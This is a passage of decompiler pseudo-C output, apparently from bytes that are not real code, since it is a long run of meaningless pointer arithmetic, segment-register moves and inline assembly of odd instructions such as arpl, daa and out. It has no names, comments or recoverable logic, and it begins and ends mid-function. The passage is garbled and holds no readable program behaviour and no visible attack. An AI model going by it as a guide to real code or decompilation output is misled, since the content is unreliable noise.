      				_t498 = _t492 +  *0xa516cf00 +  *_t428 +  *0xd816cf00 +  *_t428 +  *_t428 +  *((intOrPtr*)(_t304 + 0x20));
      				 *_t304 =  *_t304 + _t304;
      				 *_t304 =  *_t304 + _t304;
      				asm("adc [eax], bl");
      				_t305 = _t304 |  *_t304;
      				 *_t305 =  *_t305 + _t305;
      				_t563 = cs;
      				 *_t305 =  *_t305 & _t305;
      				 *_t305 =  *_t305 + _t305;
      				 *((intOrPtr*)(_t551 + 0xe0e6318)) =  *((intOrPtr*)(_t551 + 0xe0e6318)) + _t305;
      				 *2 =  *2 + _t305;
      				 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x20)) + _t498;
      				 *_t305 =  *_t305 + _t305;
      				 *_t305 =  *_t305 | _t305;
      				_t461 = _t305;
      				 *((intOrPtr*)(_t558 + 0xe)) =  *((intOrPtr*)(_t558 + 0xe)) + _t461;
      				 *0x22 = 0x22 +  *0x22;
      				 *0x22 =  *0x22 | 0x00000022;
      				_t310 = _t551;
      				 *((intOrPtr*)(_t536 + 0x200130e)) =  *((intOrPtr*)(_t536 + 0x200130e)) + 2;
      				 *((intOrPtr*)(_t310 + 0x23)) =  *((intOrPtr*)(_t310 + 0x23)) + _t498;
      				 *_t310 =  *_t310 + _t310;
      				 *_t310 =  *_t310 | _t310;
      				_t311 = _t428;
      				_t429 = _t310;
      				 *((intOrPtr*)(_t461 + 0x200180e)) =  *((intOrPtr*)(_t461 + 0x200180e)) + _t498;
      				 *((intOrPtr*)(_t311 + 0x8000023)) =  *((intOrPtr*)(_t311 + 0x8000023)) + _t498;
      				 *((intOrPtr*)(_t429 + 0x180ed300)) =  *((intOrPtr*)(_t429 + 0x180ed300)) + _t498;
      				 *_t498 =  *_t498 + _t311;
      				 *((intOrPtr*)(_t311 + 0x8000023)) =  *((intOrPtr*)(_t311 + 0x8000023)) + _t498;
      				 *((intOrPtr*)(_t429 + 0x1c0ef500)) =  *((intOrPtr*)(_t429 + 0x1c0ef500)) + _t498;
      				 *_t498 =  *_t498 + _t311;
      				_t313 = _t311 + _t498 &  *(_t311 + _t498);
      				 *_t313 =  *_t313 + 2;
      				 *((intOrPtr*)(_t429 + 0x1c0f3900)) =  *((intOrPtr*)(_t429 + 0x1c0f3900)) + _t498;
      				 *0x23f400 =  *0x23f400 + _t313;
      				 *_t313 =  *_t313 + _t313;
      				 *((intOrPtr*)(_t461 + 0xa0e5c18)) =  *((intOrPtr*)(_t461 + 0xa0e5c18)) + _t498;
      				 *_t313 =  *_t313 + 2;
      				 *_t563 =  *_t563 + 2;
      				 *_t313 =  *_t313 + _t313;
      				 *0x270E633A =  *((intOrPtr*)(0x270e633a)) + _t313;
      				 *_t313 =  *_t313 + 2;
      				 *((intOrPtr*)(_t313 + 0x24)) =  *((intOrPtr*)(_t313 + 0x24)) + 0x22;
      				 *_t313 =  *_t313 + _t313;
      				 *_t313 =  *_t313 + _t313;
      				_t430 = _t313;
      				 *((intOrPtr*)(_t558 + 0xf)) =  *((intOrPtr*)(_t558 + 0xf)) + _t430;
      				_t315 = _t429 |  *_t429;
      				 *_t315 =  *_t315 | _t315;
      				if( *_t315 >= 0) {
      					 *_t315 =  *_t315 + _t315;
      					 *_t315 =  *_t315 + _t315;
      					_t423 = _t461;
      					_t488 = _t315;
      					 *((intOrPtr*)(_t536 + 0x8002b0f)) =  *((intOrPtr*)(_t536 + 0x8002b0f)) + _t430;
      					 *((intOrPtr*)(_t423 + 0x24)) =  *((intOrPtr*)(_t423 + 0x24)) + _t430;
      					 *((intOrPtr*)(_t488 + 0x34100500)) =  *((intOrPtr*)(_t488 + 0x34100500)) + _t498;
      					 *_t498 =  *_t498 + 2;
      					 *0 =  *0 + _t498;
      					_t315 = _t488;
      					_t461 = _t423;
      					 *((intOrPtr*)(_t461 + 0x10)) =  *((intOrPtr*)(_t461 + 0x10)) + 2;
      				}
      				_t317 = _t315 -  *_t315 |  *(_t315 -  *_t315);
      				 *0 = _t317;
      				_t318 = _t461;
      				_t462 = _t317;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *0x25ec00 =  *0x25ec00 + _t462;
      				 *_t318 =  *_t318 + _t318;
      				 *((intOrPtr*)(0x270e633a)) =  *((intOrPtr*)(0x270e633a)) + _t318;
      				 *0x260000 =  *0x260000 + _t462;
      				 *_t318 =  *_t318 + _t318;
      				 *((intOrPtr*)(_t430 + 0x4110d100)) =  *((intOrPtr*)(_t430 + 0x4110d100)) + _t498;
      				 *0x261c00 =  *0x261c00 + _t462;
      				 *_t318 =  *_t318 + _t318;
      				 *((intOrPtr*)(_t430 + 0x46111500)) =  *((intOrPtr*)(_t430 + 0x46111500)) + _t498;
      				 *0x22 =  *0x22 + _t462;
      				 *0x22 =  *0x22 + _t498;
      				 *_t318 =  *_t318 + _t318;
      				 *_t318 =  *_t318 + _t318;
      				_t319 = _t430;
      				_t431 = _t318;
      				 *_t536 =  *_t536 + _t498;
      				asm("adc [ebx], ecx");
      				asm("str word [esi]");
      				 *_t319 =  *_t319 + _t319;
      				 *((intOrPtr*)(_t431 + 0x50115900)) =  *((intOrPtr*)(_t431 + 0x50115900)) + _t498;
      				 *_t319 =  *_t319 + _t498;
      				 *((intOrPtr*)(_t319 + 0x26)) =  *((intOrPtr*)(_t319 + 0x26)) + _t462;
      				 *_t319 =  *_t319 + _t319;
      				 *_t319 =  *_t319 + _t319;
      				_t320 = _t431;
      				_t432 = _t319;
      				 *((intOrPtr*)(_t432 + 0x11)) =  *((intOrPtr*)(_t432 + 0x11)) + _t432;
      				_push(_t558);
      				 *_t462 =  *_t462 + _t498;
      				 *((intOrPtr*)(_t320 + 0x27)) =  *((intOrPtr*)(_t320 + 0x27)) + _t462;
      				 *_t320 =  *_t320 + _t320;
      				 *_t320 =  *_t320 + _t320;
      				_t321 = _t462;
      				_t463 = _t320;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t432 =  *_t432 + _t498;
      				 *_t536 =  *_t536 + _t463;
      				_t433 =  *_t321;
      				 *_t321 = _t432;
      				asm("arpl [esi], cx");
      				asm("daa");
      				 *_t433 =  *_t433 + _t498;
      				_t322 = _t321 + _t321;
      				asm("daa");
      				 *_t322 =  *_t322 + _t322;
      				 *_t322 =  *_t322 + _t322;
      				_t323 = _t433;
      				_t434 = _t322;
      				 *((intOrPtr*)(_t536 + 0x13005c11)) =  *((intOrPtr*)(_t536 + 0x13005c11)) + _t434;
      				 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t323;
      				 *((intOrPtr*)(_t463 + 0xa0e5c18)) =  *((intOrPtr*)(_t463 + 0xa0e5c18)) + _t498;
      				 *((intOrPtr*)(_t323 + _t323)) =  *((intOrPtr*)(_t323 + _t323)) + _t498;
      				asm("cld");
      				 *_t323 =  *_t323 - _t323;
      				 *_t323 =  *_t323 + _t323;
      				 *((intOrPtr*)(0x270e633a)) =  *((intOrPtr*)(0x270e633a)) + _t323;
      				 *((intOrPtr*)(_t323 + _t323)) =  *((intOrPtr*)(_t323 + _t323)) + _t498;
      				asm("adc [ecx], ch");
      				 *_t323 =  *_t323 + _t323;
      				 *_t323 =  *_t323 + _t323;
      				_t324 = _t463;
      				 *0x14003410 =  *0x14003410 + _t324;
      				 *((intOrPtr*)(_t324 + 0x29)) =  *((intOrPtr*)(_t324 + 0x29)) + _t498;
      				 *_t324 =  *_t324 + _t324;
      				 *_t324 =  *_t324 + _t324;
      				_t325 = _t323;
      				_t465 = _t324;
      				 *((intOrPtr*)(_t434 + 0x15006b12)) =  *((intOrPtr*)(_t434 + 0x15006b12)) + _t465;
      				 *((intOrPtr*)(_t498 + _t558)) =  *((intOrPtr*)(_t498 + _t558)) + _t325;
      				 *_t325 =  *_t325 + _t325;
      				 *_t325 =  *_t325 + _t325;
      				_t326 = _t434;
      				_t435 = _t325;
      				 *((intOrPtr*)(_t558 + 0x16007212)) =  *((intOrPtr*)(_t558 + 0x16007212)) + _t465;
      				 *((intOrPtr*)(_t498 + _t558)) =  *((intOrPtr*)(_t498 + _t558)) + _t326;
      				 *_t326 =  *_t326 + _t326;
      				 *((intOrPtr*)(_t435 + 0x7912f100)) =  *((intOrPtr*)(_t435 + 0x7912f100)) + _t498;
      				 *_t536 =  *_t536 + _t498;
      				 *((intOrPtr*)(_t326 + 0x2a)) =  *((intOrPtr*)(_t326 + 0x2a)) + _t435;
      				 *((intOrPtr*)(_t435 - 0x7eeced00)) =  *((intOrPtr*)(_t435 - 0x7eeced00)) + _t498;
      				 *_t465 =  *_t465 + _t435;
      				_t329 = _t465;
      				_t466 = _t326 + _t465;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t435 =  *_t435 + _t435;
      				 *((intOrPtr*)(0x22 + _t558)) =  *((intOrPtr*)(0x22 + _t558)) + _t329;
      				 *_t329 =  *_t329 + _t329;
      				 *_t329 =  *_t329 + _t329;
      				_t436 =  *_t329;
      				 *_t329 = _t435;
      				asm("arpl [esi], cx");
      				asm("daa");
      				 *_t436 =  *_t436 + _t436;
      				 *_t329 =  *_t329 + _t436;
      				 *[cs:eax] =  *[cs:eax] + _t329;
      				 *_t329 =  *_t329 + _t329;
      				 *_t329 =  *_t329 | 0x008c1621;
      				asm("sbb eax, [eax]");
      				 *0x22 =  *0x22 - _t466;
      				 *_t329 =  *_t329 + _t329;
      				 *_t329 =  *_t329 + _t329;
      				_t553 = _t329;
      				 *((intOrPtr*)(_t536 + 0x16)) =  *((intOrPtr*)(_t536 + 0x16)) + 0x22;
      				 *_t436 =  *_t436 + _t436;
      				 *((intOrPtr*)(0x22 + _t553)) =  *((intOrPtr*)(0x22 + _t553)) + _t498;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t553 =  *_t553 + _t436;
      				_t332 = _t466 + _t436;
      				 *_t332 =  *_t332 ^ _t332;
      				 *_t332 =  *_t332 + _t332;
      				 *((intOrPtr*)(_t553 + 0x270e6318)) =  *((intOrPtr*)(_t553 + 0x270e6318)) + _t332;
      				 *_t553 =  *_t553 + _t436;
      				 *((intOrPtr*)(0x22 + _t553)) =  *((intOrPtr*)(0x22 + _t553)) + 0x22;
      				 *_t332 =  *_t332 + _t332;
      				 *_t332 =  *_t332 + _t332;
      				_t333 = _t553;
      				_t554 = _t332;
      				 *((intOrPtr*)(_t536 + 0x16)) =  *((intOrPtr*)(_t536 + 0x16)) + _t333;
      				 *_t554 =  *_t554 + _t436;
      				 *_t333 =  *_t333 + _t498;
      				_t334 = _t333 ^  *_t333;
      				 *_t334 =  *_t334 + _t334;
      				 *0x0A0E5C3A =  *((intOrPtr*)(0xa0e5c3a)) + _t498;
      				 *0x22 =  *0x22 + _t334;
      				 *((intOrPtr*)(_t334 + 0x33)) =  *((intOrPtr*)(_t334 + 0x33)) + 0x22;
      				 *_t334 =  *_t334 + _t334;
      				 *_t334 =  *_t334 + _t334;
      				_t437 =  *_t334;
      				 *_t334 = _t436;
      				asm("arpl [esi], cx");
      				asm("daa");
      				 *0x22 =  *0x22 + _t334;
      				 *((intOrPtr*)(_t437 + _t554)) =  *((intOrPtr*)(_t437 + _t554)) + _t437;
      				 *_t334 =  *_t334 + _t334;
      				 *((intOrPtr*)(_t554 - 0x6fe9b900)) =  *((intOrPtr*)(_t554 - 0x6fe9b900)) + _t498;
      				 *0x22 =  *0x22 + _t334;
      				 *_t334 =  *_t334 + _t334;
      				 *_t334 =  *_t334 + _t334;
      				 *_t437 =  *_t437 + _t334;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t334;
      				 *((intOrPtr*)(_t334 + _t334)) =  *((intOrPtr*)(_t334 + _t334)) + _t334;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t337 = _t334 ^ 0x00000000 |  *(_t334 ^ 0x00000000);
      				 *[es:eax] =  *[es:eax] + _t337;
      				 *_t337 =  *_t337 + _t337;
      				 *_t437 =  *_t437 + _t337;
      				_t499 = _t498 + _t337;
      				_t468 = 0x22 + _t554;
      				_push(ss);
      				_push(ss);
      				_t340 = ( *0xb0002600 ^ 0x00000000) + _t437;
      				_push(ss);
      				 *_t340 =  *_t340 - _t340;
      				 *_t340 =  *_t340 + _t340;
      				 *_t340 =  *_t340 + _t340;
      				_t341 = _t340 +  *_t340;
      				 *_t341 = _t437;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t499 =  *_t499 + _t468;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t345 = _t341 + _t341 ^ 0x00000000 |  *(_t341 + _t341 ^ 0x00000000);
      				 *_t345 =  *_t345 + _t345;
      				 *_t345 =  *_t345 + _t345;
      				 *_t468 = 0xf1;
      				_push(ss);
      				_push(ss);
      				_t348 = _t345 +  *_t345;
      				_push(ss);
      				 *_t348 =  *_t348 + _t348;
      				 *0x2e00 =  *0x2e00 + _t348;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t348;
      				 *_t348 =  *_t348 + _t499;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t352 = (_t348 + _t468 ^ 0x00000000 |  *(_t348 + _t468 ^ 0x00000000)) ^  *(_t348 + _t468 ^ 0x00000000 |  *(_t348 + _t468 ^ 0x00000000));
      				 *_t352 =  *_t352 + _t352;
      				 *_t352 =  *_t352 + _t352;
      				_t353 = _t352 +  *_t352;
      				 *_t468 = 0xf1;
      				_push(ss);
      				 *_t353 = 0x36000032;
      				 *_t353 =  *_t353 + _t353;
      				 *_t353 =  *_t353 + _t353;
      				_push(ss);
      				_t354 = _t353 + 0x2e00;
      				asm("int3");
      				 *0x2e00 =  *0x2e00 + _t499;
      				 *_t354 =  *_t354 + _t499;
      				 *[ss:eax] =  *[ss:eax] + _t354;
      				 *_t354 =  *_t354 + _t354;
      				 *_t499 =  *_t499;
      				ss = ss;
      				asm("rol dword [eax], 1");
      				 *0x00002E00 =  *((intOrPtr*)(0x2e00)) + 0x2e00;
      				 *((intOrPtr*)(0x2e00)) =  *((intOrPtr*)(0x2e00)) + 0x2e00;
      				_t357 = 0x2e00 +  *((intOrPtr*)(0x2e00));
      				 *_t357 = _t354;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *0x361800 =  *0x361800 + _t499;
      				 *_t357 =  *_t357 + _t357;
      				 *_t468 =  *_t468 + _t499;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t536 =  *_t536 + _t499;
      				 *_t357 =  *_t357 + _t357;
      				 *_t357 =  *_t357 + _t357;
      				 *((intOrPtr*)( *_t357)) =  *((intOrPtr*)( *_t357)) + _t357;
      				_t500 = _t499 + _t357;
      				_push(ss);
      				asm("aaa");
      				 *_t357 =  *_t357 + _t500;
      				 *[ss:eax] =  *[ss:eax] + _t357;
      				 *_t357 =  *_t357 + _t357;
      				_push(ss);
      				_t358 = _t357;
      				_push(ss);
      				 *_t358 =  *_t358 + _t358;
      				 *0x3900 =  *0x3900 + _t358;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t358;
      				 *0x3900 = 0x3900 +  *0x3900;
      				 *((intOrPtr*)(_t358 + 0x36)) =  *((intOrPtr*)(_t358 + 0x36)) + _t358;
      				 *_t358 =  *_t358 + _t358;
      				 *_t358 =  *_t358 + _t358;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t359 = _t358 |  *_t358;
      				 *0x3900 =  *0x3900 + _t359;
      				_t501 = _t500 + _t359;
      				_t470 = _t468 + _t554 + _t554;
      				_push(ss);
      				asm("fild word [eax]");
      				 *_t359 =  *_t359 + _t359;
      				 *_t554 =  *_t554 + _t501;
      				_t360 = 0x3900 + _t359;
      				_push(ss);
      				asm("in eax, 0x0");
      				 *[ds:eax] =  *[ds:eax] + _t360;
      				 *_t360 =  *_t360 + _t360;
      				 *0x3900 =  *0x3900 + _t360;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t360;
      				 *_t536 =  *_t536 + 0x3900;
      				 *((intOrPtr*)(_t360 + 0x36)) =  *((intOrPtr*)(_t360 + 0x36)) + _t470;
      				 *_t360 =  *_t360 + _t360;
      				 *_t360 =  *_t360 + _t360;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t361 = _t360 |  *_t360;
      				 *_t361 =  *_t361 + _t361;
      				 *_t361 =  *_t361 + _t361;
      				 *0x3900 =  *0x3900 + _t361;
      				_t502 = _t501 + _t361;
      				_t472 = _t470 + 1 + _t554;
      				_push(ss);
      				asm("out dx, eax");
      				 *_t472 =  *_t472 + _t361;
      				 *_t554 =  *_t554 ^ 0x00000000;
      				 *_t361 =  *_t361 + _t361;
      				 *_t554 =  *_t554 + _t502;
      				_t362 = 0x3900 + _t361;
      				_push(ss);
      				 *_t362 =  *_t362 + _t362;
      				 *_t362 =  *_t362 + _t362;
      				 *0x3900 =  *0x3900 + _t362;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t362;
      				 *_t558 =  *_t558 + _t362;
      				 *[ss:eax] =  *[ss:eax] + _t362;
      				 *_t362 =  *_t362 + _t362;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t363 = _t362 |  *_t362;
      				_t537 = _t536 + 1;
      				 *_t363 =  *_t363 + _t363;
      				 *_t363 =  *_t363 + _t363;
      				 *0x3900 =  *0x3900 + _t363;
      				_t503 = _t502 + _t363;
      				_t473 = _t472 + _t554;
      				_push(ss);
      				asm("out dx, eax");
      				 *_t537 =  *_t537 + _t363;
      				 *_t363 =  *_t363 + _t363;
      				 *_t363 =  *_t363 + _t363;
      				_push(ss);
      				_t364 = 0x3900 + _t363;
      				_push(ss);
      				 *((intOrPtr*)(_t364 + 0x36)) =  *((intOrPtr*)(_t364 + 0x36)) + 0x3900;
      				 *0x01177500 =  *((intOrPtr*)(0x1177500)) + _t503;
      				 *0x3900 =  *0x3900 + _t473;
      				 *_t554 =  *_t554 << 0;
      				 *_t364 =  *_t364 + _t364;
      				 *((intOrPtr*)(_t473 + 0xa178000)) =  *((intOrPtr*)(_t473 + 0xa178000)) + _t503;
      				 *0x3900 =  *0x3900 + _t473;
      				asm("les esi, [esi]");
      				 *_t364 =  *_t364 + _t364;
      				 *_t364 =  *_t364 + _t364;
      				_t445 = _t364;
      				 *((intOrPtr*)(_t503 + 0x4b010717)) =  *((intOrPtr*)(_t503 + 0x4b010717)) + 0x3900;
      				 *0x3900 = 0x3900 +  *0x3900;
      				 *0x3900 = 0x3900 +  *0x3900;
      				 *_t445 =  *_t445 + 0x3900;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + 0x3900;
      				 *0x000071CC =  *((intOrPtr*)(0x71cc)) + _t473;
      				 *[ss:eax] =  *[ss:eax] + 0x3900;
      				 *0x3900 = 0x3900 +  *0x3900;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t366 = 0x00003900 |  *0x3900;
      				_t555 = _t554 - 1;
      				 *_t366 =  *_t366 + _t366;
      				 *_t366 =  *_t366 + _t366;
      				 *_t445 =  *_t445 + _t366;
      				_t504 = _t503 + _t366;
      				_t474 = _t473 + _t555;
      				_push(ss);
      				asm("adc [ecx], eax");
      				_t556 = _t555 - 1;
      				_t367 = _t366 + _t366;
      				 *[ss:eax] =  *[ss:eax] + _t367;
      				 *_t367 =  *_t367 + _t367;
      				_push(ss);
      				_t368 = _t367 + _t445;
      				_push(ss);
      				_push(ss);
      				 *_t537 =  *_t537 + _t474;
      				 *_t368 =  *_t368 + _t368;
      				 *_t368 =  *_t368 + _t368;
      				_t369 = _t368 +  *_t368;
      				_t446 =  *_t369;
      				 *_t369 = _t445;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t369 =  *_t369 + _t504;
      				asm("hlt");
      				 *[ss:eax] =  *[ss:eax] + _t369;
      				 *_t369 =  *_t369 + _t369;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t370 = _t369 |  *_t369;
      				_push(_t504);
      				 *_t370 =  *_t370 + _t370;
      				 *_t370 =  *_t370 + _t370;
      				 *_t446 =  *_t446 + _t370;
      				_t505 = _t504 + _t370;
      				ds = ss;
      				 *_t505 =  *_t505 + _t505;
      				_t371 = _t370 | 0x00000037;
      				 *_t371 =  *_t371 + _t371;
      				 *_t371 =  *_t371 + _t371;
      				_push(ss);
      				_push(ss);
      				_t373 = _t371 + _t446 & 0x00005401;
      				 *_t373 =  *_t373 + _t373;
      				 *_t446 =  *_t446 + _t373;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t373;
      				 *_t556 =  *_t556 + _t505;
      				asm("sbb al, 0x37");
      				 *_t373 =  *_t373 + _t373;
      				 *_t373 =  *_t373 + _t373;
      				asm("adc [eax], ebx");
      				_t375 = cs;
      				 *_t375 =  *_t375 + _t375;
      				 *_t375 =  *_t375 + _t375;
      				 *_t446 =  *_t446 + _t375;
      				asm("das");
      				 *_t375 =  *_t375 + _t446;
      				_t376 = _t375 ^ 0x00000037;
      				 *_t376 =  *_t376 + _t376;
      				 *_t376 =  *_t376 + _t376;
      				ss = ss;
      				_t378 = ss;
      				 *_t378 =  *_t378 + _t378;
      				 *_t378 =  *_t378 + _t378;
      				 *_t446 =  *_t446 + _t378;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t378;
      				 *_t378 =  *_t378 + _t446;
      				_t379 = _t378 + 1;
      				asm("aaa");
      				 *_t379 =  *_t379 + _t379;
      				 *_t379 =  *_t379 + _t379;
      				asm("adc [eax], ebx");
      				_t380 = _t379 |  *_t379;
      				_t508 = cs;
      				 *_t380 =  *_t380 + _t380;
      				 *_t380 =  *_t380 + _t380;
      				 *_t446 =  *_t446 + _t380;
      				_push(ss);
      				asm("aaa");
      				 *_t380 =  *_t380 + _t380;
      				 *_t380 =  *_t380 + _t380;
      				_t510 = _t508 + _t380 + _t380;
      				ss = ss;
      				_t447 = _t446 + 1;
      				 *_t510 =  *_t510 + _t447;
      				 *_t380 =  *_t380 + _t380;
      				 *_t380 =  *_t380 + _t380;
      				_t381 = _t380 +  *_t380;
      				_t448 =  *_t381;
      				 *_t381 = _t447;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t510 =  *_t510 + _t448;
      				asm("aaa");
      				 *_t381 =  *_t381 + _t381;
      				 *_t381 =  *_t381 + _t381;
      				asm("adc [eax], ebx");
      				_t382 = _t381 |  *_t381;
      				_t575 = cs;
      				 *_t382 =  *_t382 + _t382;
      				 *_t382 =  *_t382 + _t382;
      				 *_t448 =  *_t448 + _t382;
      				_push(ss);
      				_t559 = _t558 - 1;
      				 *((intOrPtr*)(_t382 + _t382 + 0x7c)) =  *((intOrPtr*)(_t382 + _t382 + 0x7c)) + _t448;
      				asm("aaa");
      				 *_t382 =  *_t382 + _t382;
      				 *_t382 =  *_t382 + _t382;
      				_t512 = _t510 + _t382 + _t382;
      				ss = ss;
      				 *_t537 =  *_t537 + _t448;
      				 *_t382 =  *_t382 + _t382;
      				 *_t382 =  *_t382 + _t382;
      				_t383 = _t382 +  *_t382;
      				_t449 =  *_t383;
      				 *_t383 = _t448;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t512 =  *_t512 + _t383;
      				asm("invalid");
      				 *_t383 =  *_t383 + _t383;
      				 *_t383 =  *_t383 + _t383;
      				asm("adc [eax], ebx");
      				_t576 = _t575;
      				_push(cs);
      				_t384 = _t383 |  *_t383;
      				 *[fs:eax] =  *[fs:eax] + _t384;
      				 *_t384 =  *_t384 + _t384;
      				 *_t449 =  *_t449 + _t384;
      				_t538 = ss;
      				 *((intOrPtr*)(_t384 + _t384 - 0x5c)) =  *((intOrPtr*)(_t384 + _t384 - 0x5c)) + _t576;
      				asm("aaa");
      				 *_t384 =  *_t384 + _t384;
      				 *_t384 =  *_t384 + _t384;
      				ss = ss;
      				asm("arpl [ecx], ax");
      				 *[fs:eax] =  *[fs:eax] + _t384;
      				 *_t384 =  *_t384 + _t384;
      				 *_t449 =  *_t449 + _t384;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t384;
      				 *((intOrPtr*)(_t384 + _t384 - 0x50)) =  *((intOrPtr*)(_t384 + _t384 - 0x50)) + _t384;
      				asm("aaa");
      				 *_t384 =  *_t384 + _t384;
      				 *_t384 =  *_t384 + _t384;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t385 = _t384 |  *_t384;
      				asm("o16 add [eax], al");
      				 *_t385 =  *_t385 + _t385;
      				 *_t449 =  *_t449 + _t385;
      				_t480 = _t474 + _t556 + _t556 + _t556 + _t556 + _t556 + _t556;
      				_push(ss);
      				_t387 = _t480 +  *_t480 * 0x66;
      				asm("aaa");
      				 *_t387 =  *_t387 + _t387;
      				 *_t387 =  *_t387 + _t387;
      				_t516 = _t512 + _t384 + _t384 + _t385 + _t387;
      				ss = ss;
      				if(_t516 < 0) {
      					 *((intOrPtr*)(_t449 + _t556)) =  *((intOrPtr*)(_t449 + _t556)) + _t387;
      				}
      				 *_t387 =  *_t387 + _t387;
      				 *_t387 =  *_t387 + _t387;
      				 *_t449 =  *_t449 + _t387;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t387;
      				 *_t387 = _t480 +  *_t387;
      				 *_t387 =  *_t387 + _t387;
      				 *_t387 =  *_t387 + _t387;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t388 = _t387 |  *_t387;
      				_push(0);
      				 *_t388 =  *_t388 + _t388;
      				 *_t388 =  *_t388 + _t388;
      				_t389 = _t388 +  *_t388;
      				 *_t480 = 0xf1;
      				_push(ss);
      				if(_t389 == 0) {
      					_push(0);
      				}
      				_t390 = _t389 + _t516;
      				asm("aaa");
      				 *_t390 =  *_t390 + _t390;
      				 *_t390 =  *_t390 + _t390;
      				_push(ss);
      				_t391 = _t390 + _t449;
      				_push(ss);
      				 *_t480 =  *_t480 + 0x6b;
      				 *_t391 =  *_t391 + _t391;
      				 *_t391 =  *_t391 + _t391;
      				 *((intOrPtr*)(_t449 - 0x7ae7f800)) =  *((intOrPtr*)(_t449 - 0x7ae7f800)) + _t516;
      				 *((intOrPtr*)(_t391 + _t391)) =  *((intOrPtr*)(_t391 + _t391)) + _t559;
      				 *_t391 =  *_t391 + _t391;
      				 *_t449 =  *_t449 + _t391;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t391;
      				 *_t559 =  *_t559 + _t480;
      				_t392 = _t391 + 0x38;
      				 *_t392 =  *_t392 + _t392;
      				 *_t392 =  *_t392 + _t392;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t393 = _t392 |  *_t392;
      				asm("outsd");
      				 *_t393 =  *_t393 + _t393;
      				 *_t393 =  *_t393 + _t393;
      				 *_t449 =  *_t449 + _t393;
      				_t481 = _t480 + _t556;
      				_push(ss);
      				_t394 = _t516 + _t393;
      				_t518 = _t393;
      				 *_t538 =  *_t538 + _t559;
      				asm("sbb al, 0x38");
      				 *_t394 =  *_t394 + _t394;
      				 *_t394 =  *_t394 + _t394;
      				_push(ss);
      				_t395 = _t394 + _t449;
      				_push(ss);
      				asm("cdq");
      				 *_t395 =  *_t395 + _t556;
      				_t396 = _t395 - 0x38;
      				 *_t396 =  *_t396 + _t396;
      				 *_t396 =  *_t396 + _t396;
      				_t397 = _t449;
      				_t450 = _t396;
      				 *_t397 =  *_t397 + _t481;
      				asm("sbb [eax+0x7101], ah");
      				 *_t397 =  *_t397 + _t397;
      				 *_t450 =  *_t450 + _t397;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t397;
      				 *_t518 =  *_t518 + _t518;
      				 *_t397 =  *_t397 ^ _t450;
      				 *_t397 =  *_t397 + _t397;
      				 *_t397 =  *_t397 + _t397;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t398 = _t397 |  *_t397;
      				if (_t398 == 0) goto L11;
      				 *_t398 =  *_t398 + _t398;
      				 *_t398 =  *_t398 + _t398;
      				_t399 = _t398 +  *_t398;
      				 *_t481 = 0xf1;
      				_push(ss);
      				asm("lodsd");
      				 *((intOrPtr*)(_t399 + _t399 + 0x48)) =  *((intOrPtr*)(_t399 + _t399 + 0x48)) + _t556;
      				 *_t399 =  *_t399 + _t399;
      				 *_t556 =  *_t556 + _t518;
      				_t400 = _t399 + _t450;
      				if (_t400 <= 0) goto L12;
      				 *_t400 =  *_t400 + _t400;
      				 *_t400 =  *_t400 + _t400;
      				_t401 = _t400 +  *_t400;
      				_t452 =  *_t401;
      				 *_t401 = 1;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t401 =  *_t401 + _t452;
      				_t402 = ss;
      				 *_t402 =  *_t402 + _t402;
      				 *_t481 =  *_t481 + _t518;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t518 =  *_t518 + _t452;
      				 *_t402 =  *_t402 + _t402;
      				 *_t402 =  *_t402 + _t402;
      				_t403 = _t402 +  *_t402;
      				 *_t481 = 0xf1;
      				_t557 = 0x70007a01;
      				 *_t403 =  *_t403 + _t403;
      				 *0x70007a01 =  *0x70007a01 + _t518;
      				_t519 = _t518 + _t403;
      				ss = ss;
      				asm("lds eax, [ecx]");
